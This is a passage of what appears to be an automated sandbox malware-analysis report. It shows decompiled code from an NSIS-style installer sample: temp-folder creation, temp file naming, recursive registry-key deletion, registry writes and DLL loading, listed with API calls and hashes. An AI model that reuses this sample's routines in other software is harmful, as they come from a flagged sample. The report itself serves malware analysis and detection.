CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E6F3D1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				void* _t39;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6f3d506c = _a8;
				 *0x6f3d5070 = _a16;
				 *0x6f3d5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6f3d5048, E6F3D1651);
				_push(1);
				_t37 = E6F3D1BFF();
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6F3D243E(_t54);
					}
					_push(_t54);
					E6F3D2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E6F3D2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6F3D1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E6F3D2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E6F3D2655();
							_t37 = GlobalFree(E6F3D1312(E6F3D1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6F3D2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E6F3D15DD( *0x6f3d5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t39 = GlobalFree(_t54); // executed
							return _t39;
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6F3D2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6F3D2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6F3D2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6f3d1817
0x6f3d1817
0x6f3d1817
0x6f3d1824
0x6f3d182c
0x6f3d1839
0x6f3d1847
0x6f3d184a
0x6f3d184c
0x6f3d1851
0x6f3d1856
0x6f3d1978
0x6f3d1978
0x6f3d185c
0x6f3d1860
0x6f3d1863
0x6f3d1868
0x6f3d1869
0x6f3d186a
0x6f3d1870
0x6f3d1876
0x6f3d18a6
0x6f3d18ad
0x6f3d18d1
0x6f3d191e
0x6f3d191f
0x6f3d18d3
0x6f3d18d3
0x6f3d18d4
0x6f3d18dd
0x6f3d18de
0x6f3d18e8
0x6f3d18eb
0x6f3d18f0
0x6f3d18f7
0x6f3d18f7
0x6f3d18fd
0x6f3d18fe
0x6f3d1904
0x6f3d190a
0x6f3d1917
0x6f3d1918
0x6f3d191b
0x6f3d18af
0x6f3d18af
0x6f3d18b0
0x6f3d18c5
0x6f3d18c5
0x6f3d1929
0x6f3d192c
0x6f3d1939
0x6f3d1940
0x6f3d1948
0x6f3d194b
0x6f3d194b
0x6f3d1948
0x6f3d1958
0x6f3d1960
0x6f3d1965
0x6f3d1958
0x6f3d196d
0x00000000
0x6f3d196f
0x6f3d1970
0x00000000
0x6f3d1970
0x6f3d196d
0x6f3d187a
0x6f3d187d
0x6f3d189b
0x00000000
0x00000000
0x6f3d189e
0x6f3d18a3
0x6f3d18a3
0x6f3d18a5
0x00000000
0x6f3d18a5
0x6f3d187f
0x6f3d1880
0x6f3d1888
0x6f3d1889
0x00000000
0x6f3d1889
0x6f3d1882
0x6f3d1883
0x6f3d1891
0x00000000
0x6f3d1891
0x6f3d1886
0x00000000
0x00000000
0x00000000
0x6f3d1886

APIs

Part of subcall function 6F3D1BFF: GlobalFree.KERNEL32(?), ref: 6F3D1E74
Part of subcall function 6F3D1BFF: GlobalFree.KERNEL32(?), ref: 6F3D1E79
Part of subcall function 6F3D1BFF: GlobalFree.KERNEL32(?), ref: 6F3D1E7E

GlobalFree.KERNEL32(00000000), ref: 6F3D18C5
FreeLibrary.KERNEL32(?), ref: 6F3D194B
GlobalFree.KERNELBASE(00000000), ref: 6F3D1970

Part of subcall function 6F3D243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F3D246F

Part of subcall function 6F3D2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F3D1896,00000000), ref: 6F3D28E0

Part of subcall function 6F3D1666: wsprintfW.USER32 ref: 6F3D1694

Strings

, xrefs: 6F3D1951

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 0a695deb4797ea48c547d3af4d7c807936f3852416b2032a69c5efebf45ad8df
Instruction ID: 373167e284507229c4435882f685177a8751aaf722bbfdf6addb637bce0465f8
Opcode Fuzzy Hash: 0a695deb4797ea48c547d3af4d7c807936f3852416b2032a69c5efebf45ad8df
Instruction Fuzzy Hash: 5A415E739003459BFB10AF74D984BD537ACBF05368F04456AFD95AA0C6DBB5E184C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x00402515
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp
API String ID: 2655323295-3321534718
Opcode ID: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
Opcode Fuzzy Hash: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406062
0x00406068
0x00406069
0x00406069
0x0040606e
0x0040606f
0x00406072
0x00406077
0x0040607a
0x00406084
0x00406091
0x00406095
0x0040609d
0x00000000
0x00000000
0x004060a1
0x00000000
0x004060a3
0x004060a3
0x004060a3
0x004060a6
0x004060a9
0x004060a9
0x004060ac
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406061
nsa, xrefs: 00406069

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,758D3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,758D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-670666241
Opcode ID: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
